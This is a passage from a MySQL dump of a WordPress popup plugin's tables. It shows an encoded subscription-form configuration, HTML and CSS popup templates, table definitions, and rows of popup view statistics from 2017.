lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTQ6InN1Yl9zYl9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX3Y2X2FwaV9rZXkiO3M6MDoiIjtzOjEyOiJzdWJfdnRpZ191cmwiO3M6MDoiIjtzOjEzOiJzdWJfdnRpZ19uYW1lIjtzOjA6IiI7czoxMjoic3ViX3Z0aWdfa2V5IjtzOjA6IiI7czoxNjoic3ViX3ltbHBfYXBpX2tleSI7czowOiIiO3M6MTM6InN1Yl95bWxwX25hbWUiO3M6MDoiIjtzOjExOiJzdWJfNGRfbmFtZSI7czowOiIiO3M6MTE6InN1Yl80ZF9wYXNzIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Njp7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjExOiJZb3VyIGUtbWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIzOiJFbXB0eSAgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6MzU6IllFUywgSSB3YW50IHRvIGdldCBtb3JlIFN1YnNjcmliZXJzIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjI5OiJOZXcgc3Vic2NyaWJlciBmb3IgW3NpdGVuYW1lXSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSBpcyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjg6ImxvZ2luX2J5IjtzOjg6InVzZXJuYW1lIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6MTA6ItCb0L7Qs9C40L0iO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjg6IlJlZ2lzdGVyIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6Njoi0JjQvNGPIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjE5NToi0KHRgdGL0LvQutCwINC00LvRjyDQv9C+0LTRgtCy0LXRgNC20LTQtdC90LjRjyDQsdGL0Lsg0L7RgtC/0YDQsNCy0LvQtdC90LAg0L3QsCDQstCw0Ygg0LDQtNGA0LXRgSDRjdC70LXQutGC0YDQvtC90L3QvtC5INC/0L7Rh9GC0YsuINCf0YDQvtCy0LXRgNGM0YLQtSDQstCw0YjRgyDRjdC70LXQutGC0YDQvtC90L3Rg9GOINC/0L7Rh9GC0YMhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6NDM6ItCh0L/QsNGB0LjQsdC+INC30LAg0YDQtdCz0LjRgdGC0YDQsNGG0LjRjiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czo1ODoi0J/Rg9GB0YLQvtC5INC40LvQuCDQvdC10LTQtdC50YHRgtCy0LjRgtC10LvRjNC90YvQuSBlbWFpbCI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6NjE6ItCf0L7QtNGC0LLQtdGA0LTQuNGC0LUg0YDQtdCz0LjRgdGC0YDQsNGG0LjRjiDQvdCwIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjMzNDoi0JLRiyDQt9Cw0YDQtdCz0LjRgdGC0YDQuNGA0L7QstCw0L3RiyDQvdCwINGB0LDQudGC0LUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiDQodC70LXQtNGD0LnRgtC1ICA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+INC00LvRjyDQt9Cw0LLQtdGA0YjQtdC90LjRjyDRgNC10LPQuNGB0YLRgNCw0YbQuNC4LiDQldGB0LvQuCDQstGLINC90LUg0LfQsNGA0LXQs9C40YHRgtGA0LjRgNC+0LLQsNC70LjRgdGMINC30LTQtdGB0YwgLSDQv9GA0L7RgdGC0L4g0LjQs9C90L7RgNC40YDRg9C50YLQtSDRjdGC0L4g0YHQvtC+0LHRidC10L3QuNC1LiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czo0NToiW3NpdGVuYW1lXSAg0JLQsNGIINC70L7Qs9C40L0g0Lgg0L/QsNGA0L7Qu9GMIjtzOjI4OiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo3MToi0JvQvtCz0LjQvTogW3VzZXJfbG9naW5dPGJyIC8+0J/QsNGA0L7Qu9GMOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MTM6InJlZ19uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJyZWdfbmV3X21lc3NhZ2UiO3M6MTc3OiLQoyDQstCw0YEg0L3QvtCy0YvQuSDQv9C+0LvRjNC30L7QstCw0YLQtdC70Ywg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwg0LLQvtGCINC40L3RhNC+0YDQvNCw0YbQuNGPINC/0L7Qu9GM0LfQvtCy0LDRgtC10LvRjzogPGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6MTI6InN0YXRfZ2FfY29kZSI7czowOiIiO3M6NToidHh0XzAiO3M6MTIzOiI8cD5EbyBZb3UgV2FudCBUbzxzdHJvbmc+IEluY3JlYXNlPC9zdHJvbmc+IDxiciAvPllvdXIgU3Vic2NyaWJlcnMgPGJyIC8+PHN0cm9uZz5VcCBUbyA3MDAlPC9zdHJvbmc+IDxzdHJvbmc+Pzwvc3Ryb25nPjwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjQiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<link href=\"https://fonts.googleapis.com/css?family=Alex+Brush|Josefin+Sans\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsWrapTopImg\">\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[if enb_foot_note]\r\n						<a href=\"#\" class=\"ppsFootNote ppsPopupClose\">\r\n						[foot_note]\r\n						</a>\r\n					[endif]\r\n					\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_sm]\r\n				<div style=\"clear: both;\"></div>\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: arial;\r\n	font-size: 13px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	[if bg_type_0 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\", endColorstr=\"[bg_color_0]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	position: relative;\r\n	text-align: center;\r\n	padding: 0 0 40px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsWrapTopImg {\r\n	[if bg_type_1 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\", endColorstr=\"[bg_color_1]\",GradientType=1 ); /* ie6-9 */\r\n	[elseif bg_type_1 == \"img\"]\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-position: center bottom;\r\n    background-repeat: no-repeat;\r\n    background-size: cover;\r\n  	[endif]\r\n	\r\n	min-height: 210px;\r\n    padding: 40px 0 85px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell{\r\n    display: inline-block;\r\n    margin: 0;\r\n	position: relative;\r\n	z-index: 100;\r\n	width: 90%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	position: relative;\r\n	padding: 5px 0;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input {\r\n	width: 100%;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	border: 0 solid transparent;\r\n	height: 47px;\r\n	padding: 0;\r\n	margin: 0;\r\n	display:block;\r\n	font-family: arial;\r\n	text-align: center;\r\n}\r\n\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	border: 1px solid #01a2ea;\r\n    color: #777777;\r\n    font-size: 18px;\r\n	font-family: arial;\r\n	font-weight: normal;\r\n    height: 45px;\r\n    padding: 0 20px;\r\n	width: 100%;\r\n	display:block;\r\n	text-align: center;\r\n	margin-top: 10px;\r\n	\r\n	[if bg_type_2 == \"color\"]\r\n	background: [bg_color_2];\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	margin-top: 0px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	font-size: 18px;\r\n	font-family: arial;\r\n	font-weight: normal;\r\n	margin-top: 10px;\r\n	display:block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: inline-block;\r\n	padding-right: 2px;\r\n	vertical-align: middle;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=radio],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=checkbox] {\r\n	vertical-align: middle;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n	border: 1px solid #01a2ea;\r\n    color: #777777;\r\n    font-size: 18px;\r\n    height: auto;\r\n    padding: 20px 20px 50px;\r\n	margin-top: 10px;\r\n	\r\n	[if bg_type_2 == \"color\"]\r\n	background: [bg_color_2];\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border: 10px solid #fff;\r\n  	color: #333333;\r\n  	cursor: pointer;\r\n	font-weight: 600;\r\n	font-size: 20px;\r\n	height: auto;\r\n	display: inline-block;\r\n	padding: 15px 0 13px;\r\n	bottom: 65px;\r\n	\r\n	-webkit-border-radius: 20px;\r\n	-moz-border-radius: 20px;\r\n	border-radius: 20px;\r\n	position: absolute;\r\n    text-transform: none;\r\n	left: 5%;\r\n    width: 90%;\r\n	\r\n	[if bg_type_3 == \"color\"]\r\n	background: [bg_color_3] !important;\r\n  	[elseif bg_type_3 == \"img\"]\r\n  	background-image: url(\"[bg_img_3]\") !important;\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #999999;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]::-moz-placeholder { /* Firefox 19+ */\r\n    color: #999999;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]:-ms-input-placeholder { /* IE 10+ */\r\n    color: #999999;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]:-moz-placeholder { /* Firefox 18- */\r\n    color: #999999;\r\n}\r\n\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-family: arial;\r\n	font-size: 35px;\r\n	padding: 20px 20px 0; \r\n	text-align: center;\r\n	line-height: 45px;\r\n	position: relative;\r\n	z-index: 100;\r\n	color: #fff;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	font-family: arial;\r\n	margin: 0;\r\n	padding: 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt p {\r\n	display: inline-block;\r\n    margin: 0;\r\n    padding: 0;\r\n    width: 90%;\r\n	position: relative;\r\n	z-index: 100;\r\n	word-wrap: break-word;\r\n	line-height: 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n    color: #fff;\r\n    font-size: 53px;\r\n    line-height: 50px;\r\n    margin: 10px 0;\r\n	text-shadow: 2px 2px 0 #01a2ea;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] + .ppsFootNote {\r\n	display: inline-block !important;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	-webkit-border-radius: 10px;\r\n	-moz-border-radius: 10px;\r\n	border-radius: 10px;\r\n	\r\n	background: none !important;\r\n	border: 2px solid #cbcbcb;\r\n    color: #cbcbcb;\r\n    display: none !important;\r\n    font-size: 16px;\r\n	font-weight: bold;\r\n    height: auto !important;\r\n    margin: 60px 30px 0;\r\n	padding: 5px 20px;\r\n    position: static !important;\r\n    text-decoration: none;\r\n    top: 0 !important;\r\n    width: auto !important;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n	z-index: 1000 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: center;\r\n}\r\n','christmas-3-prev.png',1,1,1,11,0,0,0,'2015-01-10 17:59:43',49,0);
/*!40000 ALTER TABLE `wpfy_pps_popup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_popup_show_categories`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_popup_show_categories` (
  `popup_id` int(10) NOT NULL,
  `term_id` int(10) NOT NULL,
  `not_show` tinyint(1) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_popup_show_categories`
--

LOCK TABLES `wpfy_pps_popup_show_categories` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_popup_show_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfy_pps_popup_show_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_popup_show_pages`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_popup_show_pages` (
  `popup_id` int(10) NOT NULL,
  `post_id` int(10) NOT NULL,
  `not_show` tinyint(1) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_popup_show_pages`
--

LOCK TABLES `wpfy_pps_popup_show_pages` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_popup_show_pages` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfy_pps_popup_show_pages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_statistics`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `popup_id` int(11) NOT NULL DEFAULT '0',
  `type` tinyint(2) NOT NULL DEFAULT '0',
  `sm_id` tinyint(2) NOT NULL DEFAULT '0',
  `is_unique` tinyint(1) NOT NULL DEFAULT '0',
  `date_created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=744 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_statistics`
--

LOCK TABLES `wpfy_pps_statistics` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_statistics` DISABLE KEYS */;
INSERT INTO `wpfy_pps_statistics` VALUES (1,100,1,0,1,'2017-11-07 14:14:48'),(2,100,1,0,0,'2017-11-07 14:17:34'),(3,100,1,0,0,'2017-11-07 14:18:22'),(4,100,1,0,0,'2017-11-07 14:18:35'),(5,100,8,0,0,'2017-11-07 14:19:21'),(6,100,1,0,0,'2017-11-07 14:19:30'),(7,100,1,0,0,'2017-11-07 14:20:58'),(8,100,1,0,0,'2017-11-07 14:23:58'),(9,100,1,0,1,'2017-11-07 14:24:46'),(10,100,8,0,0,'2017-11-07 14:26:00'),(11,100,1,0,0,'2017-11-07 14:26:05'),(12,100,8,0,0,'2017-11-07 14:26:11'),(13,100,1,0,0,'2017-11-07 14:26:19'),(14,100,1,0,1,'2017-11-09 10:39:00'),(15,100,1,0,0,'2017-11-09 10:39:07'),(16,100,8,0,0,'2017-11-09 10:39:22'),(17,100,1,0,0,'2017-11-09 10:39:59'),(18,100,1,0,0,'2017-11-09 10:40:38'),(19,100,1,0,1,'2017-11-09 10:48:33'),(20,100,8,0,0,'2017-11-09 10:48:38'),(21,100,1,0,0,'2017-11-09 10:49:02'),(22,100,1,0,0,'2017-11-09 10:54:18'),(23,100,8,0,0,'2017-11-09 10:54:27'),(24,100,1,0,1,'2017-11-09 11:20:42'),(25,100,1,0,1,'2017-11-09 11:35:15'),(26,100,1,0,1,'2017-11-09 11:39:15'),(27,100,8,0,0,'2017-11-09 11:39:22'),(28,100,1,0,1,'2017-11-09 11:41:57'),(29,100,8,0,0,'2017-11-09 11:42:00'),(30,100,1,0,0,'2017-11-09 11:46:48'),(31,100,8,0,0,'2017-11-09 11:48:26'),(32,100,1,0,1,'2017-11-09 12:10:41'),(33,100,1,0,1,'2017-11-09 12:19:20'),(34,100,8,0,0,'2017-11-09 12:19:30'),(35,100,1,0,1,'2017-11-09 12:33:30'),(36,100,8,0,0,'2017-11-09 12:33:34'),(37,100,1,0,1,'2017-11-09 12:39:55'),(38,100,1,0,1,'2017-11-09 12:55:48'),(39,100,8,0,0,'2017-11-09 12:55:53'),(40,100,1,0,1,'2017-11-09 13:22:11'),(41,100,8,0,0,'2017-11-09 13:22:17'),(42,100,1,0,1,'2017-11-09 13:34:57'),(43,100,1,0,1,'2017-11-09 14:04:02'),(44,100,8,0,0,'2017-11-09 14:04:11'),(45,100,1,0,1,'2017-11-09 14:04:18'),(46,100,8,0,0,'2017-11-09 14:04:46'),(47,100,1,0,1,'2017-11-09 14:11:03'),(48,100,8,0,0,'2017-11-09 14:11:05'),(49,100,1,0,0,'2017-11-09 14:11:25'),(50,100,8,0,0,'2017-11-09 14:11:29'),(51,100,1,0,0,'2017-11-09 14:11:32'),(52,100,8,0,0,'2017-11-09 14:11:51'),(53,100,1,0,1,'2017-11-09 14:16:39'),(54,100,8,0,0,'2017-11-09 14:16:44'),(55,100,1,0,1,'2017-11-09 14:19:07'),(56,100,8,0,0,'2017-11-09 14:19:21'),(57,100,1,0,0,'2017-11-09 14:20:00'),(58,100,8,0,0,'2017-11-09 14:20:03'),(59,100,1,0,1,'2017-11-09 14:24:39'),(60,100,1,0,1,'2017-11-09 14:29:52'),(61,100,1,0,1,'2017-11-09 14:45:09'),(62,100,8,0,0,'2017-11-09 14:45:22'),(63,100,1,0,1,'2017-11-09 14:48:56'),(64,100,1,0,1,'2017-11-09 15:25:22'),(65,100,8,0,0,'2017-11-09 15:28:26'),(66,100,1,0,0,'2017-11-09 15:33:58'),(67,100,8,0,0,'2017-11-09 15:34:31'),(68,100,1,0,0,'2017-11-09 15:35:25'),(69,100,1,0,1,'2017-11-09 15:35:39'),(70,100,8,0,0,'2017-11-09 15:35:42'),(71,100,1,0,1,'2017-11-09 16:00:59'),(72,100,8,0,0,'2017-11-09 16:01:02'),(73,100,1,0,1,'2017-11-09 16:09:36'),(74,100,8,0,0,'2017-11-09 16:09:39'),(75,100,1,0,0,'2017-11-09 16:12:42'),(76,100,8,0,0,'2017-11-09 16:13:02'),(77,100,1,0,1,'2017-11-09 16:35:24'),(78,100,8,0,0,'2017-11-09 16:35:32'),(79,100,1,0,1,'2017-11-09 17:15:42'),(80,100,8,0,0,'2017-11-09 17:16:09'),(81,100,1,0,1,'2017-11-09 17:18:31'),(82,100,8,0,0,'2017-11-09 17:20:09'),(83,100,1,0,1,'2017-11-09 17:25:32'),(84,100,8,0,0,'2017-11-09 17:27:50'),(85,100,1,0,1,'2017-11-09 17:37:18'),(86,100,8,0,0,'2017-11-09 17:39:41'),(87,100,1,0,1,'2017-11-09 18:02:55'),(88,100,8,0,0,'2017-11-09 18:04:34'),(89,100,1,0,1,'2017-11-09 18:08:00'),(90,100,8,0,0,'2017-11-09 